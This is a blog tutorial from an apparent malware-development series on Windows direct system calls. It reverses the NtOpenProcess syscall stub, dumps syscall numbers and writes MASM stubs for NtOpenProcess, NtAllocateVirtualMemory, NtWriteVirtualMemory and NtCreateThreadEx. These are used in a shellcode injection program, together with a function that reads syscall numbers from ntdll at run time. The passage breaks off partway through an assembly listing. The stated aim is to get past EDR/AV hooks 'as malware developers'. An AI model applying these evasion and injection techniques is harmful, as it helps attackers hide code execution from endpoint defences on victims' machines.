Direct System Calls

August 20th, 2023

Prerequisites

This blog entry is the next logical progression of our malware development series. This post assumes that you're already comfortable with WinAPI and aware of some NTAPIs exported from ntdll.dll. Hopefully, you've gone ahead and tinkered with some of these topics as we've already done below:

Overview

In the last blog post, we talked about the process - rather, the "flow path" that a typical WinAPI function (like WriteFile, CreateFile, etc.) will take from "user-land" all the way down to "kernel-land." So naturally, let's shimmy down a tiny step lower and look at what actually happens to our functions when we reach that threshold to the kernel-space. Furthermore, we'll see how we might be able to leverage these system calls for our purposes as malware developers. Let's revisit this picture from the previous blog to get a better idea of what we're about to talk about:

When WriteFile makes its trek down the user-space, it resolves into a lower, less-abstracted function which, along with many other functions (prefixed with Nt/Zw), is exported from ntdll.dll. For WriteFile, its NTAPI counterpart from ntdll.dll is called NtWriteFile. Then, it crosses over to the kernel-space using the SYSENTER or SYSCALL instructions.

To get a grasp of the differences between the different syscall instructions, read this.

These syscalls give us and our programs (which reside in user-space) a way to interface with the kernel. Since we, as user-space residents, can't operate in the kernel ourselves, we need these intermediaries/interfaces to do the work on our behalf. By design, being able to run in the kernel directly would violate the "Principle of Least Privilege (PoLP)" that gives rise to the protection rings that are the foundation of our modern operating systems:

Of course, by now, you should already know what these rings are, where/when they're used, and their features/privileges. This is great and all but I still have to sell you the idea of actually using syscalls. So far, we haven't really seen any useful cases/scenarios in which a syscall should be used over what we've already been doing with the NTAPI.

The Benefit of Syscalls

You might be thinking, "crow, aside from removing yet another abstraction, what's the point of using syscalls when the NTAPI was serving us so well?" Well, typically, the lower you go the more fine-tunability and control you're given for your programs. However, using syscalls directly is most fruitful in cases where pesky EDRs/AVs have hooked our functions. I won't get too in-depth about API Hooking because that topic deserves a blog post all on its own but here's a quick rundown:

API Hooking is one of the techniques used by defensive solutions (like EDRs/AVs) to monitor and intercept calls to commonly abused APIs (such as CreateRemoteThreadEx, NtAllocateVirtualMemory, et cetera), inspect the arguments supplied to them, and redirect the execution flow of a function. Typically, hooks are implemented using trampolines or inline hooking (again, we'll get into these in another blog post). Generally, in order to do all of this, an EDR will load/inject its own DLL into a process:

The way these hooks actually change the execution flow of the function is by replacing the first five (5) bytes of the function with an unconditional jmp instruction (meaning that no matter what, when the instruction is reached, it will jump to the address specified). Observe the following image, it shows a typical (unhooked) function and a hooked one:

This is done in an attempt to monitor which APIs are being called, in what order, what arguments are being supplied to them, etc. However, an unhooked x64 syscall stub begins with the bytes 4c 8b d1 b8 (mov r10, rcx followed by mov eax, SSN), while an inline-hooked one typically begins with e9 (the opcode for jmp rel32) followed by a four-byte relative offset that differs from hook to hook (e9 0f 64 f8 ..., for example). That makes it pretty trivial to find hooked functions by checking the first couple of bytes. So, instead of calling a function like NtWriteVirtualMemory and risking having our function and its arguments redirected and examined by those EDRs, we could just issue the syscall ourselves - since defensive solutions can't really hook the invocation of a system call instruction (don't celebrate too early, it's still pretty easy for them to detect it).
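To make the jmp part a bit more concrete, here's a minimal sketch of how the destination of a five-byte jmp rel32 is worked out: the four bytes after e9 are a signed, little-endian offset measured from the end of the instruction. The function name and the addresses used with it are made up purely for illustration; this isn't taken from any particular tool.

```c
#include <stdint.h>

/* Decode where a 5-byte `jmp rel32` (opcode 0xE9) lands.
 * insn      : the five instruction bytes
 * insn_addr : the (hypothetical) address the instruction sits at
 * Returns 0 if the first byte isn't 0xE9. */
uint64_t jmp_rel32_target(const uint8_t insn[5], uint64_t insn_addr) {
    if (insn[0] != 0xE9) {
        return 0;
    }

    /* The displacement is stored little-endian right after the opcode. */
    uint32_t raw = (uint32_t)insn[1]
                 | ((uint32_t)insn[2] << 8)
                 | ((uint32_t)insn[3] << 16)
                 | ((uint32_t)insn[4] << 24);
    int32_t rel = (int32_t)raw; /* signed: jumps can go backwards too */

    /* The offset is relative to the address of the *next* instruction. */
    return insn_addr + 5 + (int64_t)rel;
}
```

For example, the bytes e9 10 00 00 00 placed at the made-up address 0x1000 would jump to 0x1015, and e9 fb ff ff ff at the same address would jump right back to 0x1000.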

Direct syscalls aren't EDR/AV-bypassing magic spells. It's still really easy for defensive solutions to figure out that something malicious is going on. Why would a normal, boring, unassuming-ass program need to invoke syscall, sysenter, int 2eh inside of it? We'll go into more depth about this in a later module, but an EDR can see if a syscall originated from your program or if it had a natural progression as one would expect down to a syscall. So, don't be fooled - syscalls are cool and all, but we'll still need to put in some elbow grease.

Anyways, it's time to move on to the "identifiers" of these syscalls, i.e., the syscall numbers. If you want an easy-to-follow video that reiterates what's been said above, I'd urge you to watch the following:

System Call Numbers

Before a syscall is invoked, a value that's specific to the function being called is put into the eax register. These identifying numbers are called System Service Numbers (SSNs). Because syscalls belong to the taboo-undocumented and low-level sector of Microsoft technology, it's important to note that these numbers aren't always the same for each build/version of Windows. A system call number can change (and without warning) - which is why Microsoft is so vehemently against us fiddling around with undocumented shit. The best way to understand what SSNs or "syscall numbers" are is by taking a look at a real disassembled function. We'll start from the more abstracted Win32 API, and walk down until we finally get to the syscall stub. Let's consider the following code:

#include <windows.h>
#include <stdio.h>
#include <stdlib.h> /* atoi */

int main(int argc, char **argv) {

	if (argc < 2) {
		puts("usage: handles.exe <PID>");
		return -1;
	}

	DWORD PID = atoi(argv[1]);
	HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);

	if (hProcess == NULL) {
		printf("[OpenProcess] failed, error: 0x%lx", GetLastError());
		return -1;
	}

	printf("[%p] got a handle to the process!", hProcess);
	CloseHandle(hProcess);
	(void)getchar();
	return 0;
}

It's a very simple program that'll just get a handle on a process with a supplied PID. If we open this up in a debugger, like x64dbg, we'll see the symbols present in this program, as well as the modules from which we're importing said symbols.

The following section isn't necessary. You can very easily just look into each subsequent module for the functions you're looking for within x64dbg or any other debugger. In other words, instead of finding our main function, seeing a call to kernel32!OpenProcess -> kernelbase!OpenProcess -> ntdll!NtOpenProcess, etc., you can just look within the symbols tab, and select the module you want (ntdll), and find the function (NtOpenProcess) there if you search for it. I'm just showing this off to start building up our reverse engineering skills little by little. If you want to look at the syscalls right away without all this mumbo-jumbo, then see the images below.

Then, we search for the NTAPI that we want to disassemble, in this case, we'll do NtOpenProcess:

After finding the function we want, we can double-click on it and we'll see the syscall stub for the function:

And there you go! It's as simple as that. If you want to get a more "reverse-engineer-y" perspective, then please read on! Otherwise, click here to move on to the next section, if you're already familiar with syscall stubs and such.

Reversing Our Program

After opening up our program in the debugger, we can look for the handles.exe "module" and in the symbols pane, we can search for "main" to find the core logic behind our program.

If we select this, we'll see the following in the debugger:

To see this in a more "manageable" way, we can enter the "graph" view by pressing the g key:

Since we're targeting OpenProcess and its lower-level NTAPI counterpart, we'll go to the section where that function resides to see what's happening.

If we press g again to go into the text view, and hover on the call qword ptr ds:[<&OpenProcess>] line, we can see that our call to OpenProcess resolves to the OpenProcess from Kernel32 being called:

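Before checking out what the OpenProcess in Kernel32 does, we can see the arguments for our OpenProcess function right above the call to the function. If you can recall, we very briefly covered "calling conventions" in the DLL Injection post. In it, we mentioned how the Windows API uses the __stdcall calling convention. Keep in mind that this only holds for 32-bit (x86) builds; 64-bit builds use the Microsoft x64 calling convention instead, where the first four integer arguments are passed in rcx, rdx, r8, and r9.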

Just below this paragraph, we can see a really useful table that shows us the particularities of the __stdcall calling convention:

You can read more about this calling convention below:

From the table above, we can see that in the __stdcall calling convention, our arguments are passed right to left and the called function cleans up after itself by popping its own arguments from the stack. Looking at our OpenProcess function, as well as the arguments, we'd expect a 32-bit build to push the arguments onto the stack from right to left, as seen in the image below:

And indeed, the disassembly sets the arguments up in that order: dwProcessId first, followed by bInheritHandle, and lastly, dwDesiredAccess. Since this build is 64-bit, though, the values land in registers (r8, rdx, and rcx respectively) rather than on the stack:

Also, please don't limit yourself to one debugger. It's very fun (in my opinion) to see what this might look like in another debugger. For example, let's look at OpenProcess in yet another debugger, WinDbg. We can see the same thing (although note that this is a x86 version of the handles.exe program)!

Let's quickly take a moment to understand the assembly just to make sure that what we have there are actually the arguments. We'll start with the first argument in the disassembly view, dwProcessId. We can see that it gets its value from ss:[rbp+4] and places it in the lower DWORD of the r8 register (which is denoted by the "d" suffix in "r8d", read more here):

mov r8d, dword ptr ss:[rbp+4]
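One detail worth knowing about this instruction: on x86-64, writing to a 32-bit sub-register like r8d also clears the upper 32 bits of the full register, whereas writing to a 16-bit sub-register leaves the rest untouched. Here's a tiny sketch that models both behaviours in plain C; the function names are mine and only exist for the sake of the example.

```c
#include <stdint.h>

/* Models a 32-bit write such as `mov r8d, <value>`:
 * the low DWORD takes the new value and the upper DWORD is zeroed. */
uint64_t write_low_dword(uint64_t old_reg, uint32_t value) {
    (void)old_reg; /* nothing from the old register contents survives */
    return (uint64_t)value;
}

/* Models a 16-bit write such as `mov r8w, <value>`:
 * only the low WORD changes, the upper 48 bits are preserved. */
uint64_t write_low_word(uint64_t old_reg, uint16_t value) {
    return (old_reg & ~0xFFFFULL) | value;
}
```

So whatever garbage was sitting in r8 beforehand, the full register ends up holding just our 32-bit value once the mov has run.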

If we set a breakpoint on this instruction (also making sure to supply a CLI argument (File > Change Command Line > "c:\path\to\program.exe" <PID>) to the PID of the process we want to get a handle on, in my case, I'm just gonna target a simple notepad) and run the program by hitting this icon at the top:

Or entering in g/go in the command box section at the bottom. We can see that once we hit the breakpoint on this instruction:

The r8 register (which is going to eventually hold our target's PID), isn't set to anything resembling our supplied PID:

After stepping a single instruction (sti/StepInto in the command box), just so the mov r8d, dword ptr ss:[rbp+4] instruction has actually been executed, we can see that the r8 register does update to a new value:

This value "0x4788", is actually our PID! All we have to do is convert this to decimal to see it:
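If you'd rather not reach for a calculator, the conversion is a one-liner in C. This is just a small sketch using the standard strtoul function; the wrapper name hex_to_decimal is made up for the example.

```c
#include <stdlib.h>

/* Parse a hexadecimal string (an optional "0x" prefix is accepted when the
 * base is 16) and return its numeric value. */
unsigned long hex_to_decimal(const char *hex) {
    return strtoul(hex, NULL, 16);
}
```

Calling hex_to_decimal("0x4788") gives 18312, since 4*4096 + 7*256 + 8*16 + 8 = 18312.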

Okay, so the dwProcessId argument is in the right place with the right value. Let's move on to bInheritHandle. We've set this to FALSE in our code:

And, as we know, if we XOR something against itself, it'll just be 0. And, that's definitely happening here:

xor edx, edx

We can see this reflected here in the RDX register as well, after stepping a single instruction:

Lastly, we have the dwDesiredAccess. In the code, we've set this to the "PROCESS_ALL_ACCESS" access right, which is the value (0x1FFFFF):

These individual rights, when added up (0x000F0000L + 0x00100000L + 0xFFFF), equal 0x1FFFFF.
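Here's a quick sketch of that arithmetic. The three values are the ones listed above; I've given them SKETCH_-prefixed names of my own so that they don't collide with the real definitions in the Windows headers. Because none of the three masks share any bits, OR-ing them together gives the same result as adding them.

```c
#include <stdint.h>

/* Local copies of the three components, named for this example only. */
#define SKETCH_STANDARD_RIGHTS_REQUIRED 0x000F0000u
#define SKETCH_SYNCHRONIZE              0x00100000u
#define SKETCH_PROCESS_SPECIFIC_RIGHTS  0x0000FFFFu

/* Combine the individual rights into a single access mask. */
uint32_t process_all_access(void) {
    return SKETCH_STANDARD_RIGHTS_REQUIRED
         | SKETCH_SYNCHRONIZE
         | SKETCH_PROCESS_SPECIFIC_RIGHTS;
}
```

process_all_access() comes out to 0x1FFFFF, which matches what we see in the disassembly.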

This is definitely the value we see right before the call to our OpenProcess function, and we'll see that this value gets put into the RCX register as well before the call to OpenProcess.

Let's finally inspect the call instruction to OpenProcess. We know from previous posts that pretty much all of the WinAPI functions we've used to this point have been exported from a library called Kernel32. If we double-click on this OpenProcess symbol from the disassembly, we'll see the following:

Our function gets resolved into the OpenProcess that's exported from Kernel32. Double-clicking this and then going into graph-view, we can see:

It's evident now that whenever we call certain functions that are exported by a library like Kernel32, as seen from the code, our function doesn't run right away. In a previous blog post, we talked about this behaviour; how our function actually gets its functionality from kernelbase.dll and how there's this little proxy-footsie dance going on. A quote from the previous blog:

So this begs the question then, what the hell is that KERNELBASE.dll thing and where did it come from? KERNELBASE was made by Microsoft to act as a sort of "proxy" for your API calls. If we look at the documentation, we can see it being discussed here:
"As an example of functionality that we moved to low-level binaries, kernelbase.dll gets functionality from kernel32.dll and advapi32.dll. This means that the existing binary now forwards calls down to the new binary rather than handling them directly..."

The point is, when we call OpenProcess from our code, the journey has just begun. If we look at where the <kernel32.OpenProcess> section is jumping to, we can see that it goes to the OpenProcess inside of kernelbase.dll:

We can double-click this and graph view this as well to get a better picture of what's happening here:

We're almost inside the syscall section. From kernelbase.dll, we can see that there's yet another call to a function, more specifically, we're calling the lower-level NTAPI exported from ntdll.dll: NtOpenProcess. You can see this in the line call qword ptr ds:[<NtOpenProcess>]

Finally, let's once again see the graph view of this (the "text" view is sufficient in understanding the workings of the syscall stubs, it's just with a graph, it's a bit easier to see the flow when it comes to jumps - especially if you're newer to the whole reversing-practice).

The most important part to pay attention to from this syscall stub is the following instruction:

mov eax, 26 ; SSN

The value "0x26" is the syscall number. This is the number associated with the NtOpenProcess function. After moving the syscall number into the eax register, there's a test byte ptr ds:[7FFE0308],1 instruction to determine if the syscall instruction is to be used or if the int 2E instruction is to be used. The int 2E instruction was used in 32-bit Windows to enter kernel-mode, hence the "legacy syscall instruction."

"The system call dispatcher on x86 NT has undergone several revisions over the years. Until recently, the primary method used to make system calls was the int 2e instruction (software interrupt, vector 0x2e). This is a fairly quick way to enter CPL 0 (kernel mode), and it is backwards compatible with all 32-bit capable x86 processors. With Windows XP, the mainstream mechanism used to do system calls changed; From this point forward, the operating system selects a more optimized kernel transition mechanism based on your processor type. Pentium II and later processors will instead use the sysenter instruction, which is a more efficient mechanism of switching to CPL 0 (kernel mode), as it dispenses with some needless (in this case) overhead of usual interrupt dispatching." - Nynaeve

You might be wondering what that 0x7FFE0308 address is. In Windows, there's a structure called KUSER_SHARED_DATA which as the legendary Geoff Chappell mentions in his post, "The [...] address for the shared data [structure] is 0x7FFE0000, both in 32-bit and 64-bit Windows." This structure is incredibly important when it comes to Windows Internals and for us as malware developers.

"The KUSER_SHARED_DATA structure defines the layout of a data area that the kernel places at a pre-set address for sharing with user-mode software. The original intention seems to have been to enable user-mode software to get frequently needed global data, notably the time, without the overhead of calling kernel mode." - Geoff Chappell

If we dump this structure and take a look at some of its members, we can see what's being tested in that test byte ptr ds:[7FFE0308],1 line.

0:000> dt ntdll!_KUSER_SHARED_DATA 0x7FFE0000
   +0x000 TickCountLowDeprecated : 0
   +0x004 TickCountMultiplier : 0xfa00000
   +0x008 InterruptTime    : _KSYSTEM_TIME
   +0x014 SystemTime       : _KSYSTEM_TIME
   +0x020 TimeZoneBias     : _KSYSTEM_TIME
   +0x02c ImageNumberLow   : 0x8664
 [...]
   +0x2f8 TestRetInstruction : 0xc3
   +0x300 QpcFrequency     : 0n10000000
   +0x308 SystemCall       : 0              ; 7FFE0308
   +0x30c Reserved2        : 0
   +0x310 SystemCallPad    : [2] 0
   +0x320 TickCount        : _KSYSTEM_TIME
   +0x320 TickCountQuad    : 0x6f74bb
   +0x350 BaselineInterruptTimeQpc : 0x00000109`bb6c758a
[...]
   +0x3c8 TimeZoneBiasEffectiveStart : _LARGE_INTEGER 0x01d9da15`f5332463
   +0x3d0 TimeZoneBiasEffectiveEnd : _LARGE_INTEGER 0x01da0fad`4f987000
   +0x3d8 XState           : _XSTATE_CONFIGURATION
   +0x710 FeatureConfigurationChangeStamp : _KSYSTEM_TIME
   +0x71c Spare            : 0

We can see that the SystemCall member resides at the offset of 0x308. So, the test byte ptr ds:[7FFE0308],1 instruction is testing (performing a bitwise AND operation) to see if the lowest bit of the byte at the address 0x7FFE0308 (KUSER_SHARED_DATA->SystemCall) is set to 1 or not. On my machine, we can see that it's 0:

0:000> db 0x7FFE0308 L1
00000000`7ffe0308  00
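The address in that test instruction is nothing more than the fixed base of the structure plus the member's offset. As a small sketch (the macro and function names are mine, the two numbers come from the quote and the dump above):

```c
#include <stdint.h>

/* Fixed user-mode address of KUSER_SHARED_DATA, per the quote above. */
#define KUSER_SHARED_DATA_BASE 0x7FFE0000u
/* Offset of the SystemCall member, taken from the dt output above. */
#define SYSTEMCALL_OFFSET      0x308u

/* Address of a member = base of the structure + offset of the member. */
uint32_t shared_data_member_address(uint32_t offset) {
    return KUSER_SHARED_DATA_BASE + offset;
}
```

shared_data_member_address(SYSTEMCALL_OFFSET) gives 0x7FFE0308, the exact address that the stub is testing.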

Originally, when I was first trying to understand the flow of this stub, I was pretty confused since my KUSER_SHARED_DATA->SystemCall was set to 0 and I had thought that the int 2Eh branch would be triggered. I had assumed that the flow would look something like:

00007FFE4F5CD4C8 | F60425 0803FE7F 01   test byte ptr ds:[7FFE0308],1
00007FFE4F5CD4D0 | 75 03                jne ntdll.7FFE4F5CD4D5 -------
00007FFE4F5CD4D2 | 0F05                 syscall                      |
00007FFE4F5CD4D4 | C3                   ret                          |
00007FFE4F5CD4D5 | CD 2E                int 2E <----------------------
00007FFE4F5CD4D7 | C3                   ret

However, after setting a breakpoint on both the syscall and int 2E instructions to see which would get invoked, I noticed that indeed, the syscall instruction was the one being hit:

So, what's going on here? The value being compared (1) and the SystemCall member (which again, on my machine was 0) aren't equal ( $1 \ne 0$ ), so shouldn't the jne have jumped to the int 2E instruction at the address 00007FFE4F5CD4D5?

Yes, I know many of you assembly veterans are clawing at your walls and screens right now - but I'm providing this for newcomers who may have struggled with this concept as I once did.

You see... the issue was that my understanding of the jne and test instructions was flawed - I kept mistaking a test instruction for a cmp instruction. My logic would've been sound if the check were being done with a cmp. However, with a test instruction, it's a bit different, which is why I was getting so confused. So, let's delve into this really quickly to clear everything up. Please skip to the next section if you're not interested.

TEST, CMP, JNE, ZF Waltz

The test instruction performs a bitwise AND operation on two operands. Meanwhile, a cmp just does a subtraction. For example, in the case of the test instruction, performing a test on 1011 and 1101 would look something like:

; test (bitwise-AND (&))
1011
1101
----
1001

The results of these operations (test and cmp) aren't actually kept, rather, the flags that they alter during these operations are kept. There are a couple of flags that get used by the test instruction, but the one we're most interested in is the ZF (Zero Flag). If the result of the test operation is 0, the ZF is set to 1, otherwise, it's set to 0. When we get to the jne ntdll.7FFE4F5CD4D5 instruction:

We can see that at that moment, the ZF flag is set to 1:

So, the jne instruction jumps (or doesn't) to the specified address depending on whether the ZF flag is set to 0 or not. If the ZF flag is one (1), then the jump isn't taken and execution falls through to the next instruction. However, if the ZF flag is zero (0), then indeed, the jne instruction will jump to the address that it's given. If a cmp instruction had been used instead of a test instruction, then yeah, we'd be right and our execution flow would land on the int 2eh branch. Look at the following two images that show this:

We can see that if we set a breakpoint on the actual jne ntdll.7FFE4F5CD4D5 instruction, and toggle the ZF flag off manually (either by double-clicking it or selecting it and pressing space), then we can force flow to change to int 2e:

It's a bit subtle but you can see the new red arrow pointing to the execution path we'd end up taking. We can hit run and we'll see that we'll end up hitting the int 2E instruction!
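To tie the whole waltz together, here's a minimal model of the three pieces in plain C. It only tracks the Zero Flag (the real instructions touch other flags too), and the function names are made up for this sketch.

```c
#include <stdbool.h>
#include <stdint.h>

/* test a, b : ZF is set when the bitwise AND of the operands is zero. */
bool zf_after_test(uint8_t a, uint8_t b) {
    return (a & b) == 0;
}

/* cmp a, b : ZF is set when the subtraction a - b is zero (a == b). */
bool zf_after_cmp(uint8_t a, uint8_t b) {
    return (uint8_t)(a - b) == 0;
}

/* jne : the jump is taken only when ZF is clear. */
bool jne_taken(bool zf) {
    return !zf;
}
```

With SystemCall set to 0, zf_after_test(0, 1) is true, so jne_taken() is false and we fall through to syscall. Had the stub used a cmp, zf_after_cmp(0, 1) would be false, the jne would be taken, and we'd land on int 2E, which is exactly the mistake I was making.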

Very fascinating stuff! I apologize for the incredible detour we just took but hopefully we have a deeper understanding of all these various concepts now. You can read more here if you'd like:

So far we've gotten a pretty decent picture of what happens on the user-mode side when we call a function. If you'd like a more in-depth view of what actually happens on the kernel-mode side after a system call has been issued, please refer to the amazing Alice Climent-Pommeret's blog post on the subject, their work is (always) fantastic and definitely worth the read!

With that being said, I've taken the liberty of drawing a ~~shitty~~ little graph of the execution flow of a typical WinAPI function:

With this gargantuan tangent finally over with, let's discuss how we may be able to dump these syscall numbers so that we can use them in our malware.

Dumping Syscall Numbers

The astute amongst you might already be thinking that you can just look inside of ntdll, find the function you need, and then dump the syscall numbers for said functions. Yes! You 100% can do that and that's typically how these syscall numbers are dumped (well, typically they're dumped from ntdll on-disk since it's more of a guarantee that things won't be altered). The only thing about this approach is that it can get really-really fucking tedious. Luckily, there are people like j00ru and his amazing syscall table in which you get all of these dumped syscalls for a variety of different Windows versions and builds:

If we look for the syscall number we had for NtOpenProcess (0x26), we'll very quickly find our function - and we can see the syscall numbers for the previous builds and versions:

Again, with things like syscalls, as you can see from the table, these things can change without warning. Furthermore, as great as the syscall table is, the official repository only goes up to Windows 10, build 20H2.

So, although it's not much different from what we've been doing - having a place where you can just Ctrl+F and search for your function and immediately get the syscall number for it, is really useful. However, again, since our version of Windows is newer than the table's last dump, we should exercise some caution. For that reason, I'll just be dumping my syscall numbers manually (you can use any debugger/disassembler/method for this).

Some of you might be raising your fists in the air wondering where syswhispers is. I'll be going over syswhispers after we've done everything manually since I believe in the "do it manually first and then find a tool that does the heavy lifting for you" approach. If you can't be arsed, click here to jump to the syswhispers section.

So, like we've done for the NtOpenProcess function, I'll rinse and repeat for all the functions we'll be using for this injection. Note that I'm currently on Windows 10, 22H2:

0:000> uf NtOpenProcess
[...]
00007ff8`aabed4c3 b826000000      mov     eax,26h
[...]

0:000> uf NtAllocateVirtualMemory
[...]
00007ff8`aabed303 b818000000      mov     eax,18h
[...]

0:000> uf NtWriteVirtualMemory
[...]
00007ff8`aabed743 b83a000000      mov     eax,3Ah
[...]

0:000> uf NtCreateThreadEx
[...]
00007ff8`aabee833 b8c2000000      mov     eax,0C2h
[...]

0:000> uf NtWaitForSingleObject
[...]
00007ff8`aabed083 b804000000      mov     eax,4
[...]

0:000> uf NtClose
[...]
00007ff8`aabed1e3 b80f000000      mov     eax,0Fh
[...]

With all of our syscall numbers dumped, we can move on to actually programming this!

Implementation

Because of the fact that we're introducing some assembly code to our project, we're going to have to do some setup inside Visual Studio to get everything working as intended (you can try to mess around with inline-asm but do note that MSVC doesn't allow you to do inline-asm for x64. So, you could look into the intel compiler, some other method, or just compile the assembly files like we're doing here). For ease of viewing and following along, I've separated the implementation into two parts: the assembly portion and the regular portion.

The Assembly Portion

We'll start by making a new empty project within Visual Studio (name it whatever you want; bonus points if you name it something funny):

Now, we're going to set up our project to use the Microsoft Macro Assembler (MASM). That's how we're going to be compiling our assembly code. Start by right-clicking your project name:

From the menu, we want to go to Build Dependencies > Build Customizations:

Once the new window pops up, we want to toggle the masm(.targets, .props) option:

Press OK and we can move on! With that finished, we can now assemble .asm files, which is awesome because now we're going to begin programming with the syscall numbers that we've dumped. All we're going to be doing, in a sense, is copying what a standard syscall stub looks like. That's pretty much it - there are some more complex .asm programs that will determine which build of Windows you're on and redirect you to the syscall that you should use (syswhispers foreshadowing), but we'll keep ours as simple as we can for now to build a basic foundation. Hit Ctrl+Shift+A to add a new item and we'll call this something like syscalls.asm:

It may be tempting to just start keyboard-spamming some incredibly juicy assembly into your newly created file right away but hold on a second. You still need to set this file up to be used with MASM. Sometimes people overlook/forget about this step and it's very easily avoidable.

We then right-click on this newly created file and go to Properties:

In this window, we want to set the Item Type to Microsoft Macro Assembler (sometimes that'll already be selected, and so if it is, you needn't worry about this step and we can just move on to the programming part) and make sure the Excluded From Build option is set explicitly to No (I don't think you have to set this but it's a simple thing we can toggle to avoid potential headaches - should they arise):

Now, we can finally start programming. Our syscalls.asm file will look something like the following:

; WINDOWS 10, 22H2 19045

.code

NtOpenProcess PROC
		mov r10, rcx
		mov eax, 26h
		syscall
		ret
NtOpenProcess ENDP

NtAllocateVirtualMemory PROC
		mov r10, rcx
		mov eax, 18h
		syscall
		ret
NtAllocateVirtualMemory ENDP

NtWriteVirtualMemory PROC
		mov r10, rcx
		mov eax, 3Ah
		syscall
		ret
NtWriteVirtualMemory ENDP

NtCreateThreadEx PROC
		mov r10, rcx
		mov eax, 0C2h
		syscall
		ret
NtCreateThreadEx ENDP

NtWaitForSingleObject PROC
		mov r10, rcx
		mov eax, 4h
		syscall
		ret
NtWaitForSingleObject ENDP

NtClose PROC
		mov r10, rcx
		mov eax, 0Fh
		syscall
		ret
NtClose ENDP

end

syscalls.asm

As we can see, all we've done is recreate the syscall stubs we've disassembled earlier. Luckily for us, our code isn't too difficult to implement or understand.

The Normal Portion

With these syscall stubs set, we can now create a header file that'll house the function prototypes necessary for this to work (recall the two NTAPI Injection blogs). You could do all of this in a single file without a header but we actually take showers here and aren't that nerdy. Just kidding, do whatever you want. The header file just modularizes our code and makes it easier for other developers to read.

glassBox.h

The extern keyword is pretty much telling the compiler that the Nt functions we're prototyping in our glassBox.h header file are defined somewhere else; the linker then resolves them to the stubs in our .asm file. It's very important for us to include this. The great part about this technique as compared to the NTAPI injection techniques, for example, is that once this part is done, we can just call the functions as we would normally - without the whole "getting the function address from ntdll.dll using GetProcAddress" fiasco. Instead, we can call it directly! Like this, for example:

[...]

    info("getting a handle on process (%ld)...", PID);
    STATUS = NtOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &OA, &CID);
    if (STATUS != STATUS_SUCCESS) {
        warn("[NtOpenProcess] failed, error: 0x%x", STATUS);
        return EXIT_FAILURE;
    }
    okay("got a handle on the process!");
    info("\\___[ hProcess\n\t\\_0x%p]", hProcess);

[...]

With that being said, we already know all of these arguments and what they should be because we've covered them in the previous two blog posts. So, I won't be reiterating all of that here since this blog is already ludicrously long to begin with. Here's what the code should look like:

directsyscalls.c

Aside from the following section, everything should be making sense since we've already done this before:

    for (int i = 0; i < sizeof(crowPuke); i++) {
        if (i % 16 == 0) {
            printf("\n  ");
        }
        Sleep(1);
        printf(" %02X", crowPuke[i]);
    }
    puts("\n");

This is totally unnecessary code. You can get rid of this if you want. It'll be even faster since there won't be a 1ms sleep betwixt bytes being printed, but I wanted to have fun with this one and it just looks cool. Your choice, homie.

All this does is print out our shellcode (one byte at a time with a 1ms sleep per byte). Once it's printed 16-bytes in a row, it'll do a newline and start printing again; rinsing and repeating until it's done with all the shellcode. With that being said, let's finally see this in action.

Everything works beautifully. Let's now cover something that'll make this process even more streamlined and automated.

Dynamic Syscall Retrieval

When I first attempted this technique months ago, I had a thought that we should be able to dynamically retrieve these syscall numbers from the syscall stubs by just looking at the mov eax, SSN line. Well, at that time, I lacked the programmatic prowess to actually follow that through but upon reading a really fantastic blog on direct syscalls by a really cool person, VirtualAllocEx, aka Daniel Feichter from RedOps, I saw that he had done exactly that! You're urged to go and read his incredible blog below - it's much better than my garbage:

So, I used his dynamic syscall retrieval method and turned it into a single function (I'm sure this can be made even better, and you're urged to try. Again, my programming "skills" are still really subpar but I'm always learning):

/*-----------[SEEK SYSCALLS]-----------*/
DWORD GetSSN(IN HMODULE hNTDLL, IN LPCSTR NtFunction) {

    /* NULL is a pointer constant; plain 0 is the right initializer for integer types */
    DWORD NtFunctionSSN = 0;
    UINT_PTR NtFunctionAddress = 0;

    info("trying to get the address of %s...", NtFunction);
    NtFunctionAddress = (UINT_PTR)GetProcAddress(hNTDLL, NtFunction);

    if (NtFunctionAddress == 0) {
        warn("failed to get the address of %s", NtFunction);
        return 0;
    }

    okay("got the address of %s!", NtFunction);
    info("getting SSN of %s...", NtFunction);
    NtFunctionSSN = ((PBYTE)(NtFunctionAddress + 4))[0];
    okay("\\___[\n\t| %s\n\t| 0x%p+0x4\n\t|____________________0x%lx]\n", NtFunction, NtFunctionAddress, NtFunctionSSN);
    return NtFunctionSSN;

}
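To make the "+0x4" part less magical, here's a minimal sketch that does the same read on a plain byte array instead of live ntdll memory. The helper name ssn_from_stub is made up for illustration (it isn't part of the original project), and the byte pattern it checks for (4C 8B D1 B8) is an assumption about the usual unmodified x64 stub layout: mov r10, rcx followed by mov eax, imm32.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper, for illustration only: extract the SSN from a copy of
 * an x64 Nt* stub. Returns -1 if the bytes don't look like the expected stub. */
int64_t ssn_from_stub(const uint8_t *stub, size_t len) {
    /* 4C 8B D1 = mov r10, rcx ; B8 = opcode of mov eax, imm32 */
    static const uint8_t prologue[4] = { 0x4C, 0x8B, 0xD1, 0xB8 };

    assert(stub != NULL);

    /* we need the 4 prologue bytes plus the 4-byte immediate */
    if (len < 8) {
        return -1;
    }

    for (size_t i = 0; i < sizeof prologue; i++) {
        if (stub[i] != prologue[i]) {
            return -1; /* not the layout we assumed, so +0x4 means nothing here */
        }
    }

    /* the imm32 sits at offsets 4..7, stored little-endian */
    uint32_t ssn = (uint32_t)stub[4]
                 | (uint32_t)stub[5] << 8
                 | (uint32_t)stub[6] << 16
                 | (uint32_t)stub[7] << 24;

    return (int64_t)ssn;
}
```

Feeding it the bytes 4C 8B D1 B8 26 00 00 00 gives back 0x26, the NtOpenProcess SSN we've been using. Checking the prologue first is just a sanity check: if the first bytes aren't what we expect, whatever sits at +0x4 isn't an SSN.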

We will have to edit our .asm file to use an external variable (which we're going to be populating with our GetSSN function) instead of a hardcoded SSN since we're doing this dynamically now:

.data

; we're going to be getting these SSN numbers from our c program
EXTERN NtCloseSSN:DWORD                
EXTERN NtOpenProcessSSN:DWORD          
EXTERN NtCreateThreadExSSN:DWORD       
EXTERN NtWriteVirtualMemorySSN:DWORD   
EXTERN NtWaitForSingleObjectSSN:DWORD  
EXTERN NtAllocateVirtualMemorySSN:DWORD

.code

NtOpenProcess proc
		mov r10, rcx
		mov eax, NtOpenProcessSSN       ; SSN will be retrieved by reading &function+0x4
		syscall                         ; can replace with int 2eh as well
		ret                             
NtOpenProcess endp

NtAllocateVirtualMemory proc
		mov r10, rcx
		mov eax, NtAllocateVirtualMemorySSN      
